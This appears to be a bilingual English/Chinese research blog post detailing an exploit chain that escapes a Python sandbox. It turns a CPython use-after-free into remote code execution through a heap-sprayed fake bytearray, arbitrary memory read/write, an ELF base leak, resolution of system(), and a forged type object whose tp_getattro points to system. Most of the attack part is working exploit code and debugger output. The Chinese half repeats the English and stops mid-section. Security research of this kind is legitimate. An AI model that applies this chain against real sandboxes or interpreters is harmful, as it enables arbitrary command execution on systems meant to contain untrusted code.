CPython UAF: Exploit Chain Dev from UAF Trigger to RCE (EN/中文)
Building a full interpreter-level exploit chain from a CPython use-after-free to remote code execution, with pwndbg output at each step.
EN
Author: Ivan
Recently, I discovered and exploited a CPython use-after-free vulnerability inside coze-studio's legacy Python sandbox, building a interpreter-level exploit chain from memory corruption to code execution.
In this blog, I break down each step after triggering the UAF, accompanied by real debugging output in pwndbg.
Environment: Ubuntu 24.04 x86_64 · python3-dbg 3.12.3 · gdb 15 + pwndbg
The root cause of the vulnerability is covered in a separate article. This article assumes the following prerequisites: the re-entrant lifetime mismatch has been triggered, the UAF conditions are met, and we are entering the exploitation development phase.
Overview: Exploit Chain Structure
flowchart LR
UAF --> Primitive --> Leak --> Resolve --> Hijack --> Exec
UAF[Use After Free]
Primitive[Arbitrary Memory Access]
Leak[Binary Base Disclosure]
Resolve[Dynamic Symbol Resolution]
Hijack[Function Pointer Hijack]
Exec[Interpreter Mediated Code Execution]Step 1: PyByteArrayObject internal structure + fake_ba heap spray
Structure Layout (CPython 3.12)
The bytearray object header at the C layer is PyByteArrayObject, using PyObject_VAR_HEAD (three fields: ob_refcnt / ob_type / ob_size), followed by its own fields:
offset field description
+0x00 ob_refcnt reference count
+0x08 ob_type points to the bytearray type object
+0x10 ob_size logical length (Py_SIZE)
+0x18 ob_alloc physical allocated capacity
+0x20 (internal field)
+0x28 ob_bytes char*, the actual pointer to the data buffer
+0x30 ob_start data offset (usually 0)The critical field is ob_bytes. When bytearray_subscript performs index access, it uses ob_bytes + ob_start + index. If we set ob_bytes to NULL (0), then buf[addr] becomes *(0 + addr), enabling direct read/write access to the physical address addr.
fake_ba construction
The layout of fake_ba in the exploit (exactly corresponding to the fields above):
fake_ba = (
p64(0x123456) + # +0x00 ob_refcnt = fake
p64(id(bytearray)) + # +0x08 ob_type = real bytearray type
p64(2**63 - 1) + # +0x10 ob_size = MAX
p64(2**63 - 1) + # +0x18 ob_alloc = MAX
p64(0) * 3 # +0x20.. ob_bytes = 0, ob_start = 0
)The heap spray writes this template into the freed chunk. Python then internally allocates this memory as a bytearray object — the very object captured by default_handler in the exploit.
I simulated this injection process in pwndbg using ctypes, pausing at BP1 (pre-injection) and BP2 (post-injection) to directly inspect PyByteArrayObject's memory:
[Stage 1] PyByteArrayObject @ 0x7ffff74e3fb0
================================================================
BEFORE corruption:
+0x00 ob_refcnt = 0x0000000000000001 (1)
+0x08 ob_type = 0x0000000000a8cd80
+0x10 ob_size = 0x0000000000000100 (256 = logical len)
+0x18 ob_alloc = 0x0000000000000101 (257 = capacity)
+0x20 (internal) = 0x00007ffff760b880
+0x28 ob_bytes = 0x00007ffff760b880 (data buffer ptr)
+0x30 ob_start = 0x0000000000000000
AFTER corruption (fake_ba sprayed into freed slot):
+0x00 ob_refcnt = 0x0000000000123456 (fake — no GC)
+0x10 ob_size = 0x7fffffffffffffff (= 2^63-1, all bounds pass)
+0x18 ob_alloc = 0x7fffffffffffffff (= 2^63-1)
+0x28 ob_bytes = 0x0000000000000000 (NULL → buf[addr] = *(0+addr) = *addr)
len(buf) = 9223372036854775807 ← Python sees a 9223372036854775807-byte windowob_size = 0x7fffffffffffffff: Python's len(buf) returns 2^63-1. Any positive integer subscript passes the i >= Py_SIZE(self) check. ob_bytes = NULL: bytearray_subscript calculates ob_bytes + ob_start + i = 0 + 0 + addr = addr, directly accessing the physical address.
pwndbg at BP2 (heap spray completed, paused at os.kill system call return point):
─────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────
RAX 0
RBX 5
RCX 0x7ffff7c4553b (kill+11) ◂— cmp rax, -0xfff
RDI 0x11c82
RSI 5
R15 0x6a8bcf (os_kill) ◂— endbr64
RIP 0x7ffff7c4553b (kill+11) ◂— cmp rax, -0xfff
──────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────
► 0x7ffff7c4553b <kill+11> cmp rax, -0xfff
0x7ffff7c45543 <kill+19> ret
↓
0x6a8ba2 <os_kill_impl+52> cmp eax, -1
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
► 0 0x7ffff7c4553b kill+11
1 0x6a8ba2 os_kill_impl+52
2 0x6a8c0f os_kill+64
3 0x4ff074 cfunction_vectorcall_FASTCALL+103
4 0x5aa892 _PyEval_EvalFrameDefault+56003Step 2: Arbitrary read/write primitive
After the window opens, the r64/w64 implementation is straightforward:
r64 = lambda addr: int.from_bytes(bytes(mem[addr + i] for i in range(8)), 'little')
w64 = lambda addr, val: [mem.__setitem__(addr + i, (val >> 8*i) & 0xff) for i in range(8)]
read = lambda addr, sz: bytes(mem[addr + i] for i in range(sz))mem[addr] calls bytearray_subscript, which expands at the C layer to *(ob_bytes + ob_start + addr) = *(0 + 0 + addr) = *(addr). The write path mem.__setitem__(addr, byte) follows bytearray_ass_subscript, similarly writing directly to address addr.
Canary Round-Trip Verification
Canary write test in pwndbg:
[Stage 2] Arb R/W self-consistency
================================================================
target: canary_holder @ 0x7ffff74e3ec0
r64(0x7ffff74e3ec0) BEFORE write = 0x0000000000000001
ctypes direct BEFORE write = 0x0000000000000001
w64(0x7ffff74e3ec0, 0xdeadbeefcafebabe)
r64(0x7ffff74e3ec0) AFTER write = 0xdeadbeefcafebabe
ctypes direct AFTER write = 0xdeadbeefcafebabe
[PASS] read-back == 0xdeadbeefcafebabeBoth paths (r64 via mem window vs ctypes direct mapping) read the same value, passing the primitive verification.
Step 3: Leak ELF base address
Exploit the tp_dealloc pointer
id(int) returns the address of PyLong_Type in the static data segment. Within the PyTypeObject structure, tp_dealloc (the destructor pointer) resides at +0x30:
PyTypeObject offset layout:
+0x00 ob_refcnt
+0x08 ob_type
+0x10 ob_size
+0x18 tp_name (char*)
+0x20 tp_basicsize
+0x28 tp_itemsize
+0x30 tp_dealloc <- points to a function inside the Python 3 binary
+0x38 tp_vectorcall_offset
...
+0x90 tp_getattro <- later hijack targetr64(id(int) + 0x30) reads PyLong_Type.tp_dealloc, which is a function pointer within the Python3 ELF. Page-align it (>> 12 << 12), then scan page by page from the lower address until finding \x7fELF magic — this marks the ELF header.
leak = (r64(id(int) + 0x30) >> 12) << 12
while read(leak, 4) != b"\x7fELF":
leak -= 0x1000
elf_base = leakpwndbg:
[Stage 3] ELF base leak
================================================================
id(int) = PyLong_Type @ 0x9a0a20
r64(PyLong_Type + 0x30) = 0x4e1d11 (tp_dealloc)
page-aligned = 0x4e1000
ELF header @ 0x400000
magic = b'\x7fELF'
e_type = 0x0002 (2=ET_EXEC, 3=ET_DYN)
e_machine = 0x003e (62=EM_X86_64)
e_entry = 0x422066
e_phoff = 0x40 (14 entries × 56 bytes)Step 4: Parse system() from .dynamic
The ELF header contains the program header table. Traverse the PHDRs to find an entry of type PT_DYNAMIC (2), whose p_vaddr points to the .dynamic section.
.dynamic contains a series of {d_tag, d_val} pairs (8 bytes each), terminated by d_tag==0 (DT_NULL).
| tag | Value | Meaning |
|---|---|---|
| DT_JMPREL (23) | d_val | Start address of rela.plt (Relocation Table of Imported Functions) |
| DT_PLTRELSZ (2) | d_val | Total bytes of rela.plt |
| DT_SYMTAB (6) | d_val | .dynsym Address (symbol table) |
| DT_STRTAB (5) | d_val | .dynstr address (symbol name string table) |
Each Elf64_Rela entry occupies 24 bytes:
+0 r_offset (8) -> corresponding GOT slot address
+8 r_info (8) -> upper 32 bits: symbol table index; lower 32 bits: relocation type
+16 r_addend (8)Retrieve the symbol name from .dynsym[sym_idx].st_name, then read the string from .dynstr. Once "system" is found, read the GOT value to obtain the runtime system() address (assuming lazy-resolve has completed).
for i in range(dt_pltrelsz // 24):
rela = dt_jmprel + i * 24
r_offset = r64(rela) # GOT slot address
r_info = r64(rela + 8)
sym_idx = r_info >> 32
st_name = r32(dt_symtab + sym_idx * 24)
name = read(dt_strtab + st_name, 32).split(b"\x00")[0]
if name == b"system":
system = r64(r_offset) # dereference GOT → real system() address
breakpwndbg:
[Stage 4] Resolving system() via .dynamic
================================================================
PT_DYNAMIC: phdr[6] p_vaddr=0xa8add8 filesz=0x200
.dynamic resolved @ 0xa8add8
DT_JMPREL (rela.plt) = 0x41c8d8 (501 entries)
DT_SYMTAB = 0x403818
DT_STRTAB = 0x410f28
Found 'system' in rela.plt[106]:
r_offset (GOT entry addr) = 0xa8b350
sym_idx = 106
GOT[r_offset] (resolved addr)= 0x7ffff7c58750
first 8 bytes of system() = f30f1efa4885ff740xf30f1efa = endbr64, the starting instruction for libc's system() (CET environment). 0x7ffff7c58750 is the actual libc address, not a PLT stub, confirming lazy-resolve completion.
Step 5: Forge PyTypeObject
What is tp_getattro?
When Python executes obj.attr, the interpreter's execution path is:
LOAD_ATTR bytecode
-> _PyObject_GetMethod(obj, "attr")
-> PyObject_GetAttr(obj, name)
-> f = Py_TYPE(obj)->tp_getattro <- read func ptr of ob_type
-> f(obj, name) <- indirect calltp_getattro is located at offset +0x90 within PyTypeObject (based on PyObject_VAR_HEAD's 24 bytes plus field sequences). This is a getattrofunc pointer with prototype:
typedef PyObject *(*getattrofunc)(PyObject *obj, PyObject *name);If this pointer is modified to system, the interpreter will call system(obj, name) when accessing attributes. In C calling conventions, the first argument is stored in RDI. Since system(const char *command) only reads RDI, the actual effect is equivalent to system(obj) — executing the string at the address of obj.
Constructing fake_type
fake_type = flat(
0x1000, # +0x00 ob_refcnt (high value to avoid GC)
id(type(int)), # +0x08 ob_type (metaclass, keep it "valid")
b"\x00" * 0x28, # +0x10 ~ +0x37 padding (covers ob_size / tp_name /
# tp_basicsize / tp_itemsize / tp_dealloc)
system, # +0x38 start placing system()
) + p64(system) * 52 # keep filling up to +0x38 + 52*8 = +0x1E8
# overwrite tp_getattro(+0x90) and all other slotsPlace this bytes segment into a bytes object to keep it active, then fake_type_addr = id(bytes(fake_type)) + 32 (skipping the 32-byte PyBytesObject header to point to the content area).
pwndbg
[Stage 5] Fake PyTypeObject
================================================================
fake_type_bytes (PyBytesObject) @ 0xd8be40
content area (our fake type) @ 0xd8be60
int metaclass @ 0xaa6b60
Slot inspection (first 20 qwords from fake_type_addr):
+0x00: 0x0000000000001000 ← ob_refcnt
+0x08: 0x0000000000aa6b60 ← ob_type (metaclass)
+0x10: 0x0000000000000000
+0x18: 0x0000000000000000
+0x20: 0x0000000000000000
+0x28: 0x0000000000000000
+0x30: 0x0000000000000000
+0x38: 0x00007ffff7c58750 ← tp_vectorcall_offset (also system)
+0x40: 0x00007ffff7c58750 ← system() [+0x40]
+0x48: 0x00007ffff7c58750 ← system() [+0x48]
+0x50: 0x00007ffff7c58750 ← system() [+0x50]
+0x58: 0x00007ffff7c58750 ← system() [+0x58]
+0x60: 0x00007ffff7c58750 ← system() [+0x60]
+0x68: 0x00007ffff7c58750 ← system() [+0x68]
+0x70: 0x00007ffff7c58750 ← system() [+0x70]
+0x78: 0x00007ffff7c58750 ← system() [+0x78]
+0x80: 0x00007ffff7c58750 ← system() [+0x80]
+0x88: 0x00007ffff7c58750 ← system() [+0x88]
+0x90: 0x00007ffff7c58750 ← tp_getattro *** system() ***
+0x98: 0x00007ffff7c58750 ← system() [+0x98]pwndbg's x/20gx fake_type_addr verification:
(gdb) x/20gx 0xd8be60
0xd8be60: 0x0000000000001000 0x0000000000aa6b60
0xd8be70: 0x0000000000000000 0x0000000000000000
0xd8be80: 0x0000000000000000 0x0000000000000000
0xd8be90: 0x0000000000000000 0x00007ffff7c58750
0xd8bea0: 0x00007ffff7c58750 0x00007ffff7c58750
0xd8beb0: 0x00007ffff7c58750 0x00007ffff7c58750
0xd8bec0: 0x00007ffff7c58750 0x00007ffff7c58750
0xd8bed0: 0x00007ffff7c58750 0x00007ffff7c58750
0xd8bee0: 0x00007ffff7c58750 0x00007ffff7c58750
0xd8bef0: 0x00007ffff7c58750 0x00007ffff7c587500xd8bef0 = 0xd8be60 + 0x90 — tp_getattro slot — indeed points to 0x7ffff7c58750 = system().
Step 6: INCREF trick + fake_obj + RCE
Question: Where does the argument for system() come from?
When tp_getattro(obj, name) is called, obj resides in RDI. system(const char *command) receives RDI as the command string pointer. Thus system() executes the string at obj's address.
We need obj (fake_obj_addr) to point to a Python object containing shell commands, and this object must start with "id\x00..." (or other commands) in its C-layer header — specifically the first 8 bytes of the ob_refcnt field.
The ingenuity of the INCREF trick
Directly storing "id\x00..." as ob_refcnt causes issues: Python's BINARY_SUBSCR (list index access) executes Py_INCREF(item) before returning the element, incrementing ob_refcnt by 1.
Exploiting this behavior: store the command's first byte after decrementing it. The ASCII code for 'i' is 105; decrementing yields 104 = 'h'. After INCREF, 'h' → 'i', making the command valid.
# ob_refcnt initially b"hd\x00\x00\x00\x00\x00\x00" (= "id"[0]-1 + "d")
# BINARY_SUBSCR triggers Py_INCREF: ob_refcnt[0] from 0x68('h') to 0x69('i')
# system(fake_obj_addr) sees string: "id\x00..." = "id"
cmd = bytes([ord('i') - 1]) + b"d\x00\x00\x00\x00\x00\x00" # b"hd\x00..."
fake_obj = cmd + p64(fake_type_addr) + b"\x00" * 0x100
# [0..7] ob_refcnt = b"hd\x00..." <- After Py_INCREF, turns to b"id\x00..."
# [8..15] ob_type = fake_type_addr
# [16..] paddingOverwriting the ob_item pointer
Internal structure of list objects:
PyListObject:
+0x00 ob_refcnt
+0x08 ob_type
+0x10 ob_size (len(list))
+0x18 ob_item (PyObject **, point to payload array)
+0x20 allocatedr64(id(payload) + 0x18) reads ob_item (pointing to the slot address of payload[0]), then w64(ob_item_addr, fake_obj_addr) redirects payload[0] to our fake_obj:
payload = [None]
w64(r64(id(payload) + 0x18), fake_obj_addr) # overwrite ob_item[0]fake_obj before INCREF:
[Stage 6] INCREF trick + RCE
================================================================
fake_obj_bytes @ 0x7ffff74acac0
fake_obj_addr @ 0x7ffff74acae0
ob_refcnt bytes BEFORE INCREF:
raw : 6864000000000000 (b'hd\x00\x00\x00\x00\x00\x00')
[0] : 0x68 = ord('h') <- NOT 'i' yet
ob_type at +0x08:
r64(fake_obj_addr+0x08) = 0xd8be60 == fake_type_addr: True
After BINARY_SUBSCR Py_INCREF, ob_refcnt[0] += 1:
0x68 → 0x69 = ord('i') ← 'i' appears
system(fake_obj_addr) sees string: 'id'pwndbg pauses at break PyObject_GetAttr (triggered by payload[0].pwned):
─────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────
*RDI 0x7ffff74acae0 ◂— 0x6469 /* 'id' */ ← fake_obj became 'id' after INCREF
*RSI 0x7ffff7505990 ◂— 0xffffffff ← PyUnicode "pwned"
RIP 0x504607 (PyObject_GetAttr) ◂— endbr64
──────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────
► 0x504607 <PyObject_GetAttr> endbr64
0x504616 <PyObject_GetAttr+15> mov r14, qword ptr [rdi + 8]
R14, [0x7ffff74acae8] => 0xd8be60 ◂— 0x1000
↑ reads ob_type = fake_type_addr
0x50461a <PyObject_GetAttr+19> mov rax, qword ptr [rsi + 8]
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
► 0 0x504607 PyObject_GetAttr
1 0x5a5e02 _PyEval_EvalFrameDefault+36915
2 0x5b0226 _PyEval_EvalFrame+29In pwndbg, RDI = 0x7ffff74acae0. pwndbg auto-dereferences to display ◂— 0x6469 /* 'id' */ — precisely the ob_refcnt value after INCREF, little-endian 0x6469 = b"id".
Next, at PyObject_GetAttr+15: mov r14, [rdi+8] loads ob_type into R14 (= 0xd8be60 = fake_type_addr). Then at +50: call rax, where RAX = fake_type->tp_getattro = 0x7ffff7c58750 = system().
GDB output confirms tp_getattro dereferencing and execution:
[pwndbg] Inside PyObject_GetAttr — about to dispatch via ob_type->tp_getattro:
fake_obj @ 0x7ffff74acae0
ob_type @ 0xd8be60 (our fake PyTypeObject)
tp_getattro (+0x90) = 0x7ffff7c58750 ← will be called as system(fake_obj)
*fake_obj (command) = b'id\x00\x00\x00\x00\x00\x00' ('id')Raw memory of fake_obj (pwndbg x/4gx):
(gdb) x/4gx 0x7ffff74acae0
0x7ffff74acae0: 0x0000000000006469 0x0000000000d8be60
0x7ffff74acaf0: 0x0000000000000000 0x00000000000000000x6469= little-endianb"id"← INCREF modified first byte0xd8be60= fake_type_addr ← ob_type points to our fake type object
Execution result:
uid=1000(ivan) gid=1000(ivan) groups=1000(ivan),27(sudo)
Wrap-up: Complete exploit flow review
From UAF trigger to command execution, no shellcode, no ROP — entirely leveraging the interpreter's own C function pointer dispatch:
- fake_ba heap spray modifies a
bytearray's ob_bytes to NULL and ob_size to MAX → physical memory window opened - r64/w64 enables arbitrary read/write via bytearray index access
- ELF base derived by tracing back from
PyLong_Type.tp_deallocpointer - system() parsed at runtime via ELF's PT_DYNAMIC → rela.plt
- fake PyTypeObject sets
tp_getattrotosystem() - Overwrite ob_item to make
payload[0]point to a fake Python object, whose ob_refcnt stores the command string - INCREF trick: Exploits Python's
BINARY_SUBSCRauto-INCREF to change command's first byte from'h' (0x68)to'i' (0x69) - payload[0].pwned triggers
PyObject_GetAttr → tp_getattro(obj) → system("id")
(End)
CN
作者:Ivan
最近在研究 Coze Studio 的 legacy Python 沙箱时,发现了一个 CPython 的 use-after-free 漏洞。顺着这个问题往下挖,最终在本地环境里把整条从内存破坏到代码执行的利用链跑通了。
本文为完整版。我将 UAF 触发后的每一步都拆解开来,配上在 pwndbg 中的真实调试输出。
环境:Ubuntu 24.04 x86_64 · python3-dbg 3.12.3 · gdb 15 + pwndbg
漏洞根因另文。本文默认前提:re-entrant lifetime mismatch 已触发,UAF 条件已成立,我们进入利用开发流程。
总览:链路结构
flowchart LR
UAF --> RW --> Leak --> Resolve --> Hijack --> Exec
UAF[UAF 触发]
RW[任意读写]
Leak[泄露 ELF]
Resolve[解析 system]
Hijack[劫持 tp_getattro]
Exec[system 执行]第一步:PyByteArrayObject 内部结构 + fake_ba 堆喷
结构布局(CPython 3.12)
bytearray 在 C 层的对象头是 PyByteArrayObject,使用 PyObject_VAR_HEAD(三个字段:ob_refcnt / ob_type / ob_size),然后是自己的字段:
offset field 说明
+0x00 ob_refcnt 引用计数
+0x08 ob_type 指向 bytearray 类型对象
+0x10 ob_size 逻辑长度(Py_SIZE)
+0x18 ob_alloc 物理分配容量
+0x20 (内部字段)
+0x28 ob_bytes char*,数据缓冲区的实际指针
+0x30 ob_start 数据偏移(通常为 0)
关键是 ob_bytes。bytearray_subscript 做下标访问时用的是 ob_bytes + ob_start + index。如果我们把 ob_bytes 改成 NULL(0),那么 buf[addr] 就变成了 *(0 + addr),即对物理地址 addr 的直接读写。
fake_ba 构造
exploit 中 fake_ba 的布局(精确对应上述字段):
fake_ba = (
p64(0x123456) # +0x00 ob_refcnt = 假值(防 GC)
p64(id(bytearray)) # +0x08 ob_type = 真 bytearray 类型
p64(2**63 - 1) # +0x10 ob_size = MAX(所有下标合法)
p64(2**63 - 1) # +0x18 ob_alloc = MAX
p64(0) * 3 # +0x20 内部=0, +0x28 ob_bytes=NULL, +0x30 ob_start=0
)堆喷将此模板写入被释放的 chunk,之后 Python 内部再将这块内存作为 bytearray 对象分配出去——该对象即为 mem(exploit 中 default_handler 捕获的对象)。
我在 pwndbg 中用 ctypes 模拟此喷写过程,在 BP1(喷写前)和 BP2(喷写后)分别暂停,直接查看 PyByteArrayObject 的内存:
[Stage 1] PyByteArrayObject @ 0x7ffff74e3fb0
================================================================
BEFORE corruption:
+0x00 ob_refcnt = 0x0000000000000001 (1)
+0x08 ob_type = 0x0000000000a8cd80
+0x10 ob_size = 0x0000000000000100 (256 = logical len)
+0x18 ob_alloc = 0x0000000000000101 (257 = capacity)
+0x20 (internal) = 0x00007ffff760b880
+0x28 ob_bytes = 0x00007ffff760b880 (data buffer ptr)
+0x30 ob_start = 0x0000000000000000
AFTER corruption (fake_ba sprayed into freed slot):
+0x00 ob_refcnt = 0x0000000000123456 (fake — no GC)
+0x10 ob_size = 0x7fffffffffffffff (= 2^63-1, all bounds pass)
+0x18 ob_alloc = 0x7fffffffffffffff (= 2^63-1)
+0x28 ob_bytes = 0x0000000000000000 (NULL → buf[addr] = *(0+addr) = *addr)
len(buf) = 9223372036854775807 ← Python sees a 9223372036854775807-byte window
ob_size = 0x7fffffffffffffff:Python 的 len(buf) 返回 2^63-1,任何正整数下标都通过 i >= Py_SIZE(self) 检查。ob_bytes = NULL:bytearray_subscript 计算 ob_bytes + ob_start + i = 0 + 0 + addr = addr,直接成为物理地址访问。
pwndbg 在 BP2(堆喷完成,停在 os.kill 系统调用返回点):
─────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────
RAX 0
RBX 5
RCX 0x7ffff7c4553b (kill+11) ◂— cmp rax, -0xfff
RDI 0x11c82
RSI 5
R15 0x6a8bcf (os_kill) ◂— endbr64
RIP 0x7ffff7c4553b (kill+11) ◂— cmp rax, -0xfff
──────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────
► 0x7ffff7c4553b <kill+11> cmp rax, -0xfff
0x7ffff7c45543 <kill+19> ret
↓
0x6a8ba2 <os_kill_impl+52> cmp eax, -1
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
► 0 0x7ffff7c4553b kill+11
1 0x6a8ba2 os_kill_impl+52
2 0x6a8c0f os_kill+64
3 0x4ff074 cfunction_vectorcall_FASTCALL+103
4 0x5aa892 _PyEval_EvalFrameDefault+56003
第二步:任意读写原语
窗口打开后,r64 / w64 的实现很直接:
r64 = lambda addr: int.from_bytes(bytes(mem[addr + i] for i in range(8)), 'little')
w64 = lambda addr, val: [mem.__setitem__(addr + i, (val >> 8*i) & 0xff) for i in range(8)]
read = lambda addr, sz: bytes(mem[addr + i] for i in range(sz))mem[addr] 调用 bytearray_subscript,在 C 层展开为 *(ob_bytes + ob_start + addr) = *(0 + 0 + addr) = *(addr)。写入路径 mem.__setitem__(addr, byte) 走 bytearray_ass_subscript,同样直接写入地址 addr。
自洽性检验(canary round-trip)
pwndbg 中的 canary 写入测试:
[Stage 2] Arb R/W self-consistency
================================================================
target: canary_holder @ 0x7ffff74e3ec0
r64(0x7ffff74e3ec0) BEFORE write = 0x0000000000000001
ctypes direct BEFORE write = 0x0000000000000001
w64(0x7ffff74e3ec0, 0xdeadbeefcafebabe)
r64(0x7ffff74e3ec0) AFTER write = 0xdeadbeefcafebabe
ctypes direct AFTER write = 0xdeadbeefcafebabe
[PASS] read-back == 0xdeadbeefcafebabe
两条路径(r64 通过 mem 窗口 vs ctypes 直接映射)读到相同的值,原语验证通过。
第三步:泄露 ELF 基地址
利用 tp_dealloc 指针
id(int) 返回静态数据段中 PyLong_Type 的地址。在 PyTypeObject 结构中,tp_dealloc(析构函数指针)位于 +0x30:
PyTypeObject offset layout:
+0x00 ob_refcnt
+0x08 ob_type
+0x10 ob_size
+0x18 tp_name (char*)
+0x20 tp_basicsize
+0x28 tp_itemsize
+0x30 tp_dealloc ← 指向 python3 二进制内的函数
+0x38 tp_vectorcall_offset
...
+0x90 tp_getattro ← 后续 hijack 目标
r64(id(int) + 0x30) 读出 PyLong_Type.tp_dealloc,这是 python3 ELF 内的函数指针。将其页对齐(>> 12 << 12),然后向低地址逐页扫描,直到找到 \x7fELF magic——这就是 ELF header。
leak = (r64(id(int) + 0x30) >> 12) << 12
while read(leak, 4) != b"\x7fELF":
leak -= 0x1000
elf_base = leakpwndbg:
[Stage 3] ELF base leak
================================================================
id(int) = PyLong_Type @ 0x9a0a20
r64(PyLong_Type + 0x30) = 0x4e1d11 (tp_dealloc)
page-aligned = 0x4e1000
ELF header @ 0x400000
magic = b'\x7fELF'
e_type = 0x0002 (2=ET_EXEC, 3=ET_DYN)
e_machine = 0x003e (62=EM_X86_64)
e_entry = 0x422066
e_phoff = 0x40 (14 entries × 56 bytes)
第四步:从 .dynamic 解析 system()
ELF header 包含 program header table。遍历 PHDR,找到类型为 PT_DYNAMIC (2) 的条目,其 p_vaddr 指向 .dynamic 节。
.dynamic 包含一系列 {d_tag, d_val} 对(各 8 字节),以 d_tag==0 (DT_NULL) 结束。我们需要找三个 tag:
| tag | 值 | 含义 |
|---|---|---|
| DT_JMPREL (23) | d_val | rela.plt 起始地址(导入函数重定位表) |
| DT_PLTRELSZ (2) | d_val | rela.plt 总字节数 |
| DT_SYMTAB (6) | d_val | .dynsym 地址(符号表) |
| DT_STRTAB (5) | d_val | .dynstr 地址(符号名字符串表) |
每条 Elf64_Rela 占 24 字节:
+0 r_offset (8) → 对应的 GOT slot 地址
+8 r_info (8) → 高 32 位是符号表 index,低 32 位是重定位类型
+16 r_addend (8)
从 .dynsym[sym_idx].st_name 获取符号名,再从 .dynstr 读取字符串。找到 "system" 后,读取 GOT 中的值即可得到运行时 system() 地址(前提是已完成 lazy-resolve)。
for i in range(dt_pltrelsz // 24):
rela = dt_jmprel + i * 24
r_offset = r64(rela) # GOT slot address
r_info = r64(rela + 8)
sym_idx = r_info >> 32
st_name = r32(dt_symtab + sym_idx * 24)
name = read(dt_strtab + st_name, 32).split(b"\x00")[0]
if name == b"system":
system = r64(r_offset) # dereference GOT → real system() address
breakpwndbg:
[Stage 4] Resolving system() via .dynamic
================================================================
PT_DYNAMIC: phdr[6] p_vaddr=0xa8add8 filesz=0x200
.dynamic resolved @ 0xa8add8
DT_JMPREL (rela.plt) = 0x41c8d8 (501 entries)
DT_SYMTAB = 0x403818
DT_STRTAB = 0x410f28
Found 'system' in rela.plt[106]:
r_offset (GOT entry addr) = 0xa8b350
sym_idx = 106
GOT[r_offset] (resolved addr)= 0x7ffff7c58750
first 8 bytes of system() = f30f1efa4885ff74
0xf30f1efa = endbr64,这是 libc system() 的开头指令(CET 环境)。0x7ffff7c58750 是真实 libc 地址而非 PLT stub,说明符号已完成 lazy-resolve。
第五步:伪造 PyTypeObject
tp_getattro 是什么
当 Python 执行 obj.attr 时,解释器的执行路径为:
LOAD_ATTR 字节码
→ _PyObject_GetMethod(obj, "attr")
→ PyObject_GetAttr(obj, name)
→ f = Py_TYPE(obj)->tp_getattro ← 读 ob_type 里的函数指针
→ f(obj, name) ← 间接调用
tp_getattro 在 PyTypeObject 中的偏移为 +0x90(基于 PyObject_VAR_HEAD 的 24 字节加各字段顺序)。这是一个 getattrofunc 指针,原型为:
typedef PyObject *(*getattrofunc)(PyObject *obj, PyObject *name);如果将此指针改为 system,解释器访问属性时会调用 system(obj, name)。C 调用约定中第一个参数存于 RDI,而 system(const char *command) 只读取 RDI,实际效果即 system(obj)——执行 obj 地址处的字符串。
构造 fake_type
fake_type = flat(
0x1000, # +0x00 ob_refcnt(高值防 GC)
id(type(int)), # +0x08 ob_type(metaclass,保持合法性)
b"\x00" * 0x28, # +0x10 ~ +0x37 padding(覆盖 ob_size / tp_name /
# tp_basicsize / tp_itemsize / tp_dealloc)
system, # +0x38 开始填 system()
) + p64(system) * 52 # 继续填到 +0x38 + 52×8 = +0x1E8
# 覆盖 tp_getattro(+0x90) 和其他所有 slot将这段 bytes 放入一个 bytes 对象保持活跃,然后 fake_type_addr = id(bytes(fake_type)) + 32(跳过 PyBytesObject header 的 32 字节,指向内容区)。
pwndbg 内存验证
[Stage 5] Fake PyTypeObject
================================================================
fake_type_bytes (PyBytesObject) @ 0xd8be40
content area (our fake type) @ 0xd8be60
int metaclass @ 0xaa6b60
Slot inspection (first 20 qwords from fake_type_addr):
+0x00: 0x0000000000001000 ← ob_refcnt
+0x08: 0x0000000000aa6b60 ← ob_type (metaclass)
+0x10: 0x0000000000000000
+0x18: 0x0000000000000000
+0x20: 0x0000000000000000
+0x28: 0x0000000000000000
+0x30: 0x0000000000000000
+0x38: 0x00007ffff7c58750 ← tp_vectorcall_offset (also system)
+0x40: 0x00007ffff7c58750 ← system() [+0x40]
+0x90: 0x00007ffff7c58750 ← tp_getattro *** system() ***
pwndbg 的 x/20gx fake_type_addr 确认:
(gdb) x/20gx 0xd8be60
0xd8be60: 0x0000000000001000 0x0000000000aa6b60
0xd8be70: 0x0000000000000000 0x0000000000000000
0xd8be80: 0x0000000000000000 0x0000000000000000
0xd8be90: 0x0000000000000000 0x00007ffff7c58750
0xd8bea0: 0x00007ffff7c58750 0x00007ffff7c58750
0xd8bef0: 0x00007ffff7c58750 0x00007ffff7c58750
0xd8bef0 = 0xd8be60 + 0x90——tp_getattro slot——确实为 0x7ffff7c58750 = system()。
第六步:INCREF trick + fake_obj + RCE
问题:system() 的参数从哪里来
tp_getattro(obj, name) 调用时,obj 位于 RDI。system(const char *command) 接收 RDI 作为命令字符串指针。因此 system() 会执行 obj 地址处的字符串。
我们需要 obj(fake_obj_addr)指向一个包含 shell 命令的 Python 对象,且该对象在 C 层的开头——即 ob_refcnt 字段的 8 字节——必须为 "id\x00..."(或其他命令)。
INCREF trick 的精妙之处
直接存储 "id\x00..." 作为 ob_refcnt 会遇到问题:Python 的 BINARY_SUBSCR(list 下标访问)在返回元素前会执行 Py_INCREF(item),将 ob_refcnt 加 1。
利用此行为:将命令首字节减 1 后存入。'i' 的 ASCII 码为 105,减 1 得 104 = 'h'。INCREF 后 'h' → 'i',命令即正确。
cmd = bytes([ord('i') - 1]) + b"d\x00\x00\x00\x00\x00\x00" # b"hd\x00..."
fake_obj = cmd + p64(fake_type_addr) + b"\x00" * 0x100
# [0..7] ob_refcnt = b"hd\x00..." ← Py_INCREF 后变为 b"id\x00..."
# [8..15] ob_type = fake_type_addr
# [16..] paddingob_item 指针覆写
list 对象的内部结构:
PyListObject:
+0x00 ob_refcnt
+0x08 ob_type
+0x10 ob_size (len(list))
+0x18 ob_item (PyObject **,指向 payload 数组)
+0x20 allocated
payload = [None]
w64(r64(id(payload) + 0x18), fake_obj_addr) # 覆写 ob_item[0]pwndbg 在 break PyObject_GetAttr 处停下(payload[0].pwned 触发的调用):
─────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────
